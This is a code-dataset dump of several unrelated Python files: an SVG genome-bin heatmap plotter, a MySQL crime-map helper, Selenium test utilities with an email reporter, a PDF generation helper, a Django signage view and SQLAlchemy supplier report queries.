"en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.modules", "line_number": 6, "usage_type": "attribute"}, {"api_name": "collections.namedtuple", "line_number": 9, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "280009110", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /srv/whitlam/home/users/uqdparks/git/unitem/unitem/plot_common_bases.py\n# Compiled at: 2017-08-25 10:54:04\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os, sys, math, logging\nfrom biolib.common import alphanumeric_sort\nimport svgwrite\n\nclass PlotCommonBases:\n \"\"\"Create heatmap showing percentage of common bases between bins.\"\"\"\n\n def __init__(self):\n \"\"\"Initialization.\"\"\"\n self.logger = logging.getLogger('timestamp')\n self.font_size = 8\n self.cell_font_size = 6\n self.row_height = 2.5 * self.font_size\n self.col_width = self.row_height\n self.cell_offset = 2\n self.qual_col_width = 4 * self.font_size\n\n def _render_label_col(self, dwg, labels, start_x, start_y, group_id):\n \"\"\"Render column of labels.\"\"\"\n label_group = svgwrite.container.Group(id=group_id)\n dwg.add(label_group)\n for i, label in enumerate(labels):\n t = dwg.text(label, x=[\n start_x], y=[\n start_y + i * self.row_height], font_size='%fpt' % self.font_size, text_anchor='end', direction='ltr', fill='black')\n label_group.add(t)\n\n def _render_label_row(self, dwg, labels, label_start_x, row_start_y, group_id, rotation=-45):\n \"\"\"Render column of labels.\"\"\"\n label_group = svgwrite.container.Group(id=group_id)\n dwg.add(label_group)\n for i, label in enumerate(labels):\n x = label_start_x + (i + 0.5) * self.col_width\n t = dwg.text(label, x=[\n x], y=[\n row_start_y], font_size='%fpt' % self.font_size, text_anchor='start', direction='ltr', fill='black')\n t.rotate(rotation, (x, row_start_y))\n label_group.add(t)\n\n def _render_genome_quality_cols(self, dwg, bin_labels, quality, header_start_y, label_start_x, label_start_y):\n \"\"\"Plot genome completeness and contamination columns.\"\"\"\n quality_group = svgwrite.container.Group(id='genome_quality')\n dwg.add(quality_group)\n for c, gene_name in enumerate(['Completeness (%)', 'Contamination (%)']):\n x = label_start_x + (c + 0.5) * self.qual_col_width\n t = dwg.text(gene_name, x=[\n x], y=[\n header_start_y], font_size='%fpt' % self.font_size, text_anchor='start', direction='ltr', fill='black')\n t.rotate(-45, (x, header_start_y))\n quality_group.add(t)\n\n for r, bin_label in enumerate(bin_labels):\n for c, q in enumerate(quality[bin_label]):\n t = dwg.text('%.1f' % q, x=[\n label_start_x + (c + 0.5) * self.qual_col_width], y=[\n label_start_y + r * self.row_height], font_size='%fpt' % self.font_size, text_anchor='middle', direction='ltr', fill='black')\n quality_group.add(t)\n\n def _cell_properties(self, perc_common_bases):\n \"\"\"Get desired color and size of heat map cell for a given percentage of common bases.\"\"\"\n color = 'rgb(255,255,255)'\n size = self.col_width - 2 * self.cell_offset\n if perc_common_bases >= 100:\n color = 'rgb(165,15,21)'\n elif perc_common_bases >= 90:\n color = 'rgb(222,45,38)'\n size = math.sqrt(0.9) * size\n elif perc_common_bases >= 80:\n color = 'rgb(251,106,74)'\n size = math.sqrt(0.8) * size\n elif perc_common_bases >= 
70:\n color = 'rgb(252,146,114)'\n size = math.sqrt(0.7) * size\n elif perc_common_bases >= 60:\n color = 'rgb(252,187,161)'\n size = math.sqrt(0.6) * size\n elif perc_common_bases >= 50:\n color = 'rgb(254,229,217)'\n size = math.sqrt(0.5) * size\n return (color, size)\n\n def _render_row(self, dwg, bin_labels, bm_labels, common_bases, start_x, start_y):\n \"\"\"Render rows showing percentage of common bases.\"\"\"\n table_group = svgwrite.container.Group(id='table')\n dwg.add(table_group)\n for r, bin_label in enumerate(bin_labels):\n for c, bm_label in enumerate(bm_labels):\n perc_cb = common_bases[bin_label].get(bm_label, 0)\n color, size = self._cell_properties(perc_cb)\n x = start_x + c * self.col_width\n y = start_y + r * self.row_height\n if perc_cb > 0:\n base_color, base_size = self._cell_properties(0)\n rect = dwg.rect(insert=(x + 0.5 * (base_size - size),\n y + 0.5 * (base_size - size)), size=(\n size, size), fill=color)\n rect.stroke(color='rgb(196,196,196)', width=0.1)\n table_group.add(rect)\n if False:\n t = dwg.text('%d' % perc_cb, x=[\n x + 0.5 * self.col_width], y=[\n y + 0.5 * self.row_height + 0.5 * self.cell_font_size], font_size='%fpt' % self.cell_font_size, text_anchor='middle', direction='ltr', fill='rgb(0,0,0)')\n table_group.add(t)\n\n def _render_legend(self, dwg):\n \"\"\"Render legend.\"\"\"\n legend_group = svgwrite.container.Group(id='legend')\n dwg.add(legend_group)\n x = self.fig_size_x\n y = 0\n base_color, base_size = self._cell_properties(0)\n for index, perc_common_bases in enumerate([100, 90, 80, 70, 60, 50]):\n color, size = self._cell_properties(perc_common_bases)\n rect = dwg.rect(insert=(x + 0.5 * (base_size - size),\n y + 0.5 * (base_size - size)), size=(\n size, size), fill=color)\n rect.stroke(color='rgb(196,196,196)', width=0.1)\n legend_group.add(rect)\n legend_str = '%d' % perc_common_bases\n if perc_common_bases != 100:\n legend_str = '>' + legend_str\n t = dwg.text(legend_str, x=[\n x + base_size + self.cell_offset], y=[\n y + 0.5 * base_size + 0.5 * self.font_size], font_size='%fpt' % self.font_size, direction='ltr', fill='rgb(0,0,0)')\n legend_group.add(t)\n y += size + self.cell_offset\n\n def plot(self, common_bases, quality, output_plot):\n \"\"\"Create plot.\n \n Parameters\n ----------\n common_bases : d[unitem bid][binning method] -> percent common bases\n Percentage of common bases for each binning method.\n quality : d[unitem id] -> (completeness, contamination)\n Completeness and contamination of bins.\n output_plot : str\n Desired output file.\n \"\"\"\n bin_labels = alphanumeric_sort(common_bases)\n binning_methods = set()\n for bid in common_bases:\n for bm in common_bases[bid]:\n binning_methods.add(bm)\n\n bm_labels = alphanumeric_sort(binning_methods)\n table_start_x = 0\n table_start_y = 0\n if not output_plot.endswith('.svg'):\n output_plot += '.svg'\n self.fig_size_x = table_start_x + len(bm_labels) * self.col_width\n self.fig_size_x += 2 * self.qual_col_width + 0.5 * self.col_width\n self.fig_size_y = table_start_y + len(bin_labels) * self.row_height\n dwg = svgwrite.Drawing(filename=output_plot, size=(\n self.fig_size_x, self.fig_size_y), profile='full')\n dwg.set_desc(title='UniteM shared base pair plot.')\n self._render_legend(dwg)\n label_start_x = table_start_x\n label_start_y = table_start_y + 0.5 * self.row_height + 0.45 * self.font_size\n self._render_label_col(dwg, bin_labels, label_start_x, label_start_y, 'bin_labels')\n header_start_y = table_start_y - 0.5 * self.font_size\n label_start_x = table_start_x + 
0.5 * self.col_width\n label_start_y = table_start_y + 0.5 * self.row_height + 0.45 * self.font_size\n self._render_genome_quality_cols(dwg, bin_labels, quality, header_start_y, label_start_x, label_start_y)\n table_start_x += 2 * self.qual_col_width + 0.5 * self.col_width\n label_start_x = table_start_x\n header_row_start_y = table_start_y - 0.5 * self.font_size\n self._render_label_row(dwg, bm_labels, label_start_x, header_row_start_y, 'binning_method_labels')\n self._render_row(dwg, bin_labels, bm_labels, common_bases, table_start_x, table_start_y)\n dwg.save()", "sub_path": "pycfiles/unitem-0.0.18.tar/plot_common_bases.py", "file_name": "plot_common_bases.py", "file_ext": "py", "file_size_in_byte": 8581, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "svgwrite.container.Group", "line_number": 29, "usage_type": "call"}, {"api_name": "svgwrite.container", "line_number": 29, "usage_type": "attribute"}, {"api_name": "svgwrite.container.Group", "line_number": 39, "usage_type": "call"}, {"api_name": "svgwrite.container", "line_number": 39, "usage_type": "attribute"}, {"api_name": "svgwrite.container.Group", "line_number": 51, "usage_type": "call"}, {"api_name": "svgwrite.container", "line_number": 51, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 76, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 79, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 82, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 85, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 88, "usage_type": "call"}, {"api_name": "svgwrite.container.Group", "line_number": 93, "usage_type": "call"}, {"api_name": "svgwrite.container", "line_number": 93, "usage_type": "attribute"}, {"api_name": "svgwrite.container.Group", "line_number": 116, "usage_type": "call"}, {"api_name": "svgwrite.container", "line_number": 116, "usage_type": "attribute"}, {"api_name": "biolib.common.alphanumeric_sort", "line_number": 149, "usage_type": "call"}, {"api_name": "biolib.common.alphanumeric_sort", "line_number": 155, "usage_type": "call"}, {"api_name": "svgwrite.Drawing", "line_number": 163, "usage_type": "call"}]} +{"seq_id": "525932682", "text": "#coding: utf-8\nimport pymysql\nimport dbconfig\nimport datetime\n\n# All data operations are wrapped in try-finally so that the database connection is always closed cleanly\nclass DBHelper:\n\n\t# Connect to the database; a connection is needed before every table operation, with the charset specified at the end\n\tdef connect(self, database=\"crimemap\"):\n\t\treturn pymysql.connect(host='localhost',\n\t\tuser=dbconfig.db_user,\n\t\tpasswd=dbconfig.db_password,\n\t\tdb=database,\n charset = 'utf8')\n\n\t# Earlier test: fetch the description data from crimes\n\tdef get_all_inputs(self):\n\t\tconnection = self.connect() # establish a database connection before every operation\n\t\ttry:\n\t\t\tquery = \"SELECT description FROM crimes;\" # select the description data from the crimes table; note the trailing semicolon required by SQL syntax\n\t\t\twith connection.cursor() as cursor: # use with-as\n\t\t\t\tcursor.execute(query) # after the cursor executes this query, it points at the requested data\n\t\t\treturn cursor.fetchall() # fetchall turns the pointed-to data into a list Python can work with\n\t\tfinally:\n\t\t\tconnection.close()\n\n\t# Earlier test: insert description data into crimes\n\tdef add_input(self, data):\n\t\tconnection = self.connect()\n\t\ttry:\n\t\t\t# small fix to SQL injection\n\t\t\tquery = \"INSERT INTO crimes (description) VALUES (%s);\" # for testing, insert only a single description value\n\t\t\twith connection.cursor() as cursor:\n\t\t\t\tcursor.execute(query, data) # execute the query\n\t\t\t\tconnection.commit() 
# unlike reading data, inserting data modifies the database, so the change must be committed to take effect\n\t\tfinally:\n\t\t\tconnection.close()\n\n\t# Delete all rows from the crimes table\n\tdef clear_all(self):\n\t\tconnection = self.connect()\n\t\ttry:\n\t\t\tquery = \"DELETE FROM crimes;\" # delete everything in the crimes table\n\t\t\twith connection.cursor() as cursor:\n\t\t\t\tcursor.execute(query) # execute the query\n\t\t\t\tconnection.commit() # deleting data modifies the database, so commit for the change to take effect\n\t\tfinally:\n\t\t\tconnection.close()\n\n\tdef add_record(self, category, date, latitude, longitude, description):\n\t\tconnection = self.connect()\n\t\ttry:\n\t\t\tquery = \"INSERT INTO crimes (category, date, latitude, longitude, description) VALUES (%s, %s, %s, %s, %s);\"\n\t\t\twith connection.cursor() as cursor:\n\t\t\t\tcursor.execute(query, (category, date, latitude, longitude, description))\n\t\t\t\tconnection.commit()\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\tfinally:\n\t\t\tconnection.close()\n\t\n\tdef get_all_records(self):\n\t\tconnection = self.connect()\n\t\ttry:\n\t\t\tquery = \"SELECT latitude, longitude, date, category, description FROM crimes;\"\n\t\t\twith connection.cursor() as cursor:\n\t\t\t\tcursor.execute(query)\n\t\t\tnamed_crimes = []\n\t\t\t# pull the tuples from the cursor and convert them into JSON-style records in a list, for easier handling later in JavaScript\n\t\t\tfor crime in cursor:\n\t\t\t\tnamed_crime = {\n\t\t\t\t\t'latitude': crime[0],\n\t\t\t\t\t'longitude': crime[1],\n\t\t\t\t\t'date': datetime.datetime.strftime(crime[2], '%Y-%m-%d'),\n\t\t\t\t\t'category': crime[3],\n\t\t\t\t\t'description': crime[4]\n\t\t\t\t}\n\t\t\t\tnamed_crimes.append(named_crime)\n\t\t\treturn named_crimes\n\t\tfinally:\n\t\t\tconnection.close()\n", "sub_path": "dbhelper.py", "file_name": "dbhelper.py", "file_ext": "py", "file_size_in_byte": 2993, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymysql.connect", "line_number": 11, "usage_type": "call"}, {"api_name": "dbconfig.db_user", "line_number": 12, "usage_type": "attribute"}, {"api_name": "dbconfig.db_password", "line_number": 13, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 75, "usage_type": "attribute"}]} +{"seq_id": "624480608", "text": "import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\n\nclass ParkSideLendingUtilityLibException(Exception):\n \"\"\"An Exception class for the Parkside Lending utility library\"\"\"\n\n\nclass UtilityLib(object):\n \"\"\"Class for common functions across all Parkside Lending pages\"\"\"\n def __init__(self, driver_handle):\n \"\"\"Constructor\n\n Args:\n driver_handle: The initialized web driver object.\n \"\"\"\n self.driver = driver_handle\n\n def TakeScreenShot(self, path):\n \"\"\"Take a screenshot and save it to the given path\n\n Args:\n path: The path name for saving the screen shot.\n \"\"\"\n self.driver.save_screenshot(path)\n\n def GotoPage(self, nav_button_index, page):\n \"\"\"Go to a certain page by clicking the nav links and the menu options under\n them.\n\n Args:\n nav_button_index: The sequence number of the nav link, e.g. the About\n Us nav link is in the first position, so it's 1.\n page: The page menu option we will click and navigate to, e.g. the\n Contact Us page is Contact_Us.\n \"\"\"\n
nav_button_elements = self.driver.find_elements_by_xpath(\n '//ul[@class=\"nav-links\"]/li')\n ActionChains(self.driver).move_to_element(\n nav_button_elements[nav_button_index-1]).perform()\n page_link = WebDriverWait(self.driver, 30).until(\n EC.visibility_of_element_located((\n By.XPATH, '//li/a[@href=\"/Support/' + page + '\"]')))\n ActionChains(self.driver).move_to_element(page_link).click().perform()\n\n\nclass SendEmailNotification(object):\n \"\"\"Class for sending email notifications\"\"\"\n def SendEmailResult(self, source, destinations, message, subject,\n attachment_names, password, smtp_server_info):\n \"\"\"Send Email Result from source address to destination addresses with\n Formatted HTML content and screen shots.\n\n Args:\n source: Sender address.\n destinations: A list of destination addresses.\n message: Main email message.\n subject: The title of email.\n attachment_names: The name of the attachments.\n password: The password of sender mailbox.\n smtp_server_info: A tuple of sender smtp server information.\n Server address and port.\n \"\"\"\n fromaddr = source\n toaddrs = ', '.join(destinations)\n msg = MIMEMultipart('related')\n\n msg['From'] = fromaddr\n msg['To'] = toaddrs\n msg['Subject'] = subject\n html = \"\"\"\n
<html>\n <body>\n <p>Here is the screen shot of contact us page.</p>\n <img src=\"cid:cupage\">\n <p>Here is the text output of tests</p>\n <pre>\n{}\n </pre>\n <p>The screen shots of failures or errors are in the attachment.</p>\n </body>\n </html>
\n \"\"\".format(message)\n msg.attach(MIMEText(html, 'html'))\n for attachment in attachment_names:\n filename = attachment\n img = open(attachment, \"rb\").read()\n msgImg = MIMEImage(img, 'png')\n if 'cupage' in attachment:\n msgImg.add_header('Content-ID', '')\n else:\n msgImg.add_header('Content-ID', '')\n msgImg.add_header('Content-Disposition', 'inline', filename=filename)\n msg.attach(msgImg)\n server = smtplib.SMTP(smtp_server_info[0], smtp_server_info[1])\n server.starttls()\n server.login(fromaddr, password)\n text = msg.as_string()\n server.sendmail(fromaddr, destinations, text)\n server.quit()", "sub_path": "tests/pageobject/utility.py", "file_name": "utility.py", "file_ext": "py", "file_size_in_byte": 3961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 45, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 47, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 48, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 48, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 50, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 72, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 85, "usage_type": "call"}, {"api_name": "email.mime.image.MIMEImage", "line_number": 89, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "423643281", "text": "from StringIO import StringIO\nfrom pdfkit import from_string\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\n\nOPTIONS = {\n 'margin-top': '0.75in',\n 'margin-right': '0.75in',\n 'margin-bottom': '0.75in',\n 'margin-left': '0.75in',\n 'encoding': \"UTF-8\",\n 'quiet': '',\n # Security.\n 'disable-javascript': '',\n 'disable-external-links': '',\n 'disable-internal-links': '',\n 'disable-local-file-access': '',\n}\n\nPDF_MIMETYPE = 'application/pdf'\n\n\ndef html_to_pdf(html, opts=None):\n options = OPTIONS.copy()\n options.update(opts or {})\n\n return from_string(html, False, options=options)\n\n\nclass WritePDF:\n\n def __init__(self, opts=None):\n self.opts = (opts or {}).copy()\n self.output = PdfFileWriter()\n\n def add_by_pages(self, html, opts=None):\n self.opts.update(opts or {})\n\n stream = StringIO()\n stream.write(html_to_pdf(html, opts=self.opts))\n\n reader = PdfFileReader(stream)\n for page in range(reader.pages.lengthFunction()):\n self.output.addPage(reader.getPage(page))\n\n return self.output\n\n def as_content(self):\n stream = StringIO()\n self.output.write(stream)\n\n content = stream.getvalue()\n stream.close()\n\n return content\n", "sub_path": "core/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pdfkit.from_string", "line_number": 27, "usage_type": "call"}, {"api_name": "PyPDF2.PdfFileWriter", "line_number": 34, "usage_type": "call"}, {"api_name": "StringIO.StringIO", 
"line_number": 39, "usage_type": "call"}, {"api_name": "PyPDF2.PdfFileReader", "line_number": 42, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "215405114", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport logging\nimport datetime\nfrom django import http\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect, render\nfrom django.utils import timezone\nfrom intranet import settings\nfrom ..users.models import User\nfrom ..eighth.models import EighthBlock, EighthSignup\nfrom ..eighth.serializers import EighthBlockDetailSerializer\nfrom ...utils.serialization import safe_json\n\nlogger = logging.getLogger(__name__)\n\n\ndef eighth_signage(request, block_id=None):\n remote_addr = (request.META[\"HTTP_X_FORWARDED_FOR\"] if \"HTTP_X_FORWARDED_FOR\" in request.META else request.META.get(\"REMOTE_ADDR\", \"\"))\n if not request.user.is_authenticated() and remote_addr not in settings.INTERNAL_IPS:\n return render(request, \"error/403.html\", {\n \"reason\": \"You are not authorized to view this page.\"\n }, status=403)\n\n if block_id is None:\n next_block = EighthBlock.objects.get_first_upcoming_block()\n if next_block is not None:\n block_id = next_block.id\n else:\n last_block = EighthBlock.objects.order_by(\"date\").last()\n if last_block is not None:\n block_id = last_block.id\n\n block_increment = request.GET.get(\"block_increment\", 0)\n try:\n block_increment = int(block_increment)\n except ValueError:\n block_increment = 0\n\n block = None\n if block_increment > 0:\n next_blocks = next_block.next_blocks()\n if next_blocks.count() >= block_increment:\n block = next_blocks[block_increment - 1]\n\n if not block:\n try:\n block = (EighthBlock.objects\n .prefetch_related(\"eighthscheduledactivity_set\")\n .get(id=block_id))\n except EighthBlock.DoesNotExist:\n if EighthBlock.objects.count() == 0:\n # No blocks have been added yet\n return render(request, \"eighth/display.html\", {\"no_blocks\": True})\n else:\n # The provided block_id is invalid\n raise http.Http404\n\n user = User.objects.get(username=\"awilliam\")\n\n serializer_context = {\n \"request\": request,\n \"user\": user\n }\n block_info = EighthBlockDetailSerializer(block, context=serializer_context).data\n\n context = {\n \"user\": user,\n \"real_user\": request.user,\n \"block_info\": block_info,\n \"activities_list\": safe_json(block_info[\"activities\"]),\n \"active_block\": block,\n \"active_block_current_signup\": None,\n \"no_title\": (\"no_title\" in request.GET),\n \"no_detail\": not (\"detail\" in request.GET),\n \"no_rooms\": (\"no_rooms\" in request.GET),\n \"no_user_display\": True,\n \"no_fav\": True\n }\n\n return render(request, \"eighth/display.html\", context)\n", "sub_path": "intranet/apps/signage/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2931, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "intranet.settings.INTERNAL_IPS", "line_number": 22, "usage_type": "attribute"}, {"api_name": "intranet.settings", "line_number": 22, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "eighth.models.EighthBlock.objects.get_first_upcoming_block", "line_number": 28, "usage_type": "call"}, {"api_name": 
"eighth.models.EighthBlock.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "eighth.models.EighthBlock", "line_number": 28, "usage_type": "name"}, {"api_name": "eighth.models.EighthBlock.objects.order_by", "line_number": 32, "usage_type": "call"}, {"api_name": "eighth.models.EighthBlock.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "eighth.models.EighthBlock", "line_number": 32, "usage_type": "name"}, {"api_name": "eighth.models.EighthBlock.objects.prefetch_related", "line_number": 50, "usage_type": "call"}, {"api_name": "eighth.models.EighthBlock.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "eighth.models.EighthBlock", "line_number": 50, "usage_type": "name"}, {"api_name": "eighth.models.EighthBlock.DoesNotExist", "line_number": 53, "usage_type": "attribute"}, {"api_name": "eighth.models.EighthBlock", "line_number": 53, "usage_type": "name"}, {"api_name": "eighth.models.EighthBlock.objects.count", "line_number": 54, "usage_type": "call"}, {"api_name": "eighth.models.EighthBlock.objects", "line_number": 54, "usage_type": "attribute"}, {"api_name": "eighth.models.EighthBlock", "line_number": 54, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 56, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 59, "usage_type": "attribute"}, {"api_name": "django.http", "line_number": 59, "usage_type": "name"}, {"api_name": "users.models.User.objects.get", "line_number": 61, "usage_type": "call"}, {"api_name": "users.models.User.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "users.models.User", "line_number": 61, "usage_type": "name"}, {"api_name": "eighth.serializers.EighthBlockDetailSerializer", "line_number": 67, "usage_type": "call"}, {"api_name": "utils.serialization.safe_json", "line_number": 73, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "350650811", "text": "from app import db\nfrom app.api.helpers import Service\nfrom sqlalchemy import func\nfrom sqlalchemy.sql import text\nfrom app.models import Address, Product, RecruiterInfo, Supplier, SupplierDomain, Domain\n\n\nclass SuppliersService(Service):\n __model__ = Supplier\n\n def __init__(self, *args, **kwargs):\n super(SuppliersService, self).__init__(*args, **kwargs)\n\n def get_unassessed(self):\n s = text(\n \"select distinct \"\n 'd.id \"domain_id\",'\n 'd.name \"domain_name\",'\n 's.id \"supplier_id\",'\n 's.code \"supplier_code\",'\n 's.name \"supplier_name\",'\n 's.data#>>(\\'{pricing,\"\\'||d.name||\\'\",maxPrice}\\')::text[] \"supplier_price\",'\n 'u.supplier_last_logged_in,'\n 'cs.id \"case_study_id\" '\n 'from case_study cs '\n 'inner join supplier s on s.code = cs.supplier_code '\n \"inner join domain d on d.name = cs.data->>'service' \"\n 'inner join supplier_domain sd on sd.domain_id = d.id '\n ' and sd.supplier_id = s.id '\n \" and sd.status = 'unassessed'\"\n 'inner join ('\n ' select supplier_code, '\n ' max(logged_in_at) \"supplier_last_logged_in\" '\n ' from \"user\" '\n ' group by supplier_code'\n ') u on u.supplier_code = s.code '\n 'where s.data#>>(\\'{pricing,\"\\'||d.name||\\'\",maxPrice}\\')::text[] is not null'\n )\n result = db.session.execute(s)\n return [dict(r) for r in result]\n\n def get_suppliers(self):\n subquery = (\n db\n .session\n .query(\n SupplierDomain.supplier_id,\n func.json_agg(\n func.json_build_object(\n 'category', Domain.name,\n 'status', SupplierDomain.status,\n 'recruiterInfo', 
func.json_build_object(\n 'id', RecruiterInfo.id,\n 'activeCandidates', RecruiterInfo.active_candidates,\n 'databaseSize', RecruiterInfo.database_size,\n 'placedCandidates', RecruiterInfo.placed_candidates,\n 'margin', RecruiterInfo.margin,\n 'markup', RecruiterInfo.markup,\n ).label('recruiters'),\n 'pricing', func.json_build_object(\n 'supplierPrice', Supplier.data['pricing'][Domain.name]['maxPrice'].astext.label('maxPrice'),\n 'priceStatus', SupplierDomain.price_status,\n 'priceMinimum', Domain.price_minimum,\n 'priceMaximum', Domain.price_maximum,\n 'criteriaNeeded', Domain.criteria_needed\n )\n )\n ).label('categories')\n )\n .join(Domain)\n .join(Supplier)\n .outerjoin(RecruiterInfo)\n .group_by(SupplierDomain.supplier_id)\n .subquery()\n )\n\n product_subquery = (\n db\n .session\n .query(\n Product.supplier_code,\n func.json_agg(\n func.json_build_object(\n 'productName', Product.name,\n 'productSummary', Product.summary,\n 'productWebsite', Product.website,\n 'productPricingLink', Product.pricing\n )\n ).label('products')\n )\n .group_by(Product.supplier_code)\n .subquery()\n )\n\n address_subquery = (\n db\n .session\n .query(\n Address.supplier_code,\n func.json_agg(\n func.json_build_object(\n 'addressLine', Address.address_line,\n 'suburb', Address.suburb,\n 'state', Address.state,\n 'postalCode', Address.postal_code,\n )\n ).label('addresses')\n )\n .group_by(Address.supplier_code)\n .subquery()\n )\n\n result = (\n db\n .session\n .query(\n Supplier.code,\n Supplier.name,\n Supplier.abn,\n Supplier.status,\n Supplier.creation_time.label('creationTime'),\n Supplier.data['seller_type']['sme'].astext.label('sme'),\n Supplier.website,\n Supplier.linkedin,\n Supplier.data['number_of_employees'].label('numberOfEmployees'),\n Supplier.data['seller_type']['start_up'].astext.label('startUp'),\n Supplier.data['seller_type']['nfp_social_enterprise'].astext.label('notForProfit'),\n Supplier.data['regional'],\n Supplier.data['travel'],\n Supplier.data['seller_type']['disability'].astext.label('disability'),\n Supplier.data['seller_type']['female_owned'].astext.label('femaleOwned'),\n Supplier.data['seller_type']['indigenous'].astext.label('indigenous'),\n Supplier.data['representative'],\n Supplier.data['email'],\n Supplier.data['phone'],\n Supplier.data['contact_name'].label('contactName'),\n Supplier.data['contact_email'].label('contactEmail'),\n Supplier.data['contact_phone'].label('contactPhone'),\n subquery.columns.categories,\n product_subquery.columns.products,\n address_subquery.columns.addresses,\n )\n .outerjoin(subquery, Supplier.id == subquery.columns.supplier_id)\n .outerjoin(product_subquery, Supplier.code == product_subquery.columns.supplier_code)\n .outerjoin(address_subquery, Supplier.code == address_subquery.columns.supplier_code)\n .order_by(Supplier.code)\n .all()\n )\n\n return [r._asdict() for r in result]\n", "sub_path": "app/api/services/reports/suppliers.py", "file_name": "suppliers.py", "file_ext": "py", "file_size_in_byte": 6244, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "app.api.helpers.Service", "line_number": 8, "usage_type": "name"}, {"api_name": "app.models.Supplier", "line_number": 9, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.text", "line_number": 15, "usage_type": "call"}, {"api_name": "app.db.session.execute", "line_number": 39, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 39, "usage_type": "attribute"}, {"api_name": "app.db", 
"line_number": 39, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo", "line_number": 72, "usage_type": "argument"}, {"api_name": "app.models.Supplier", "line_number": 71, "usage_type": "argument"}, {"api_name": "app.models.Domain", "line_number": 70, "usage_type": "argument"}, {"api_name": "app.db.session.query", "line_number": 44, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 44, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 44, "usage_type": "name"}, {"api_name": "app.models.SupplierDomain.supplier_id", "line_number": 47, "usage_type": "attribute"}, {"api_name": "app.models.SupplierDomain", "line_number": 47, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_agg", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 48, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_build_object", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 49, "usage_type": "name"}, {"api_name": "app.models.Domain.name", "line_number": 50, "usage_type": "attribute"}, {"api_name": "app.models.Domain", "line_number": 50, "usage_type": "name"}, {"api_name": "app.models.SupplierDomain.status", "line_number": 51, "usage_type": "attribute"}, {"api_name": "app.models.SupplierDomain", "line_number": 51, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_build_object", "line_number": 52, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 52, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.id", "line_number": 53, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 53, "usage_type": "name"}, {"api_name": "app.models.RecruiterInfo.active_candidates", "line_number": 54, "usage_type": "attribute"}, {"api_name": "app.models.RecruiterInfo", "line_number": 54, 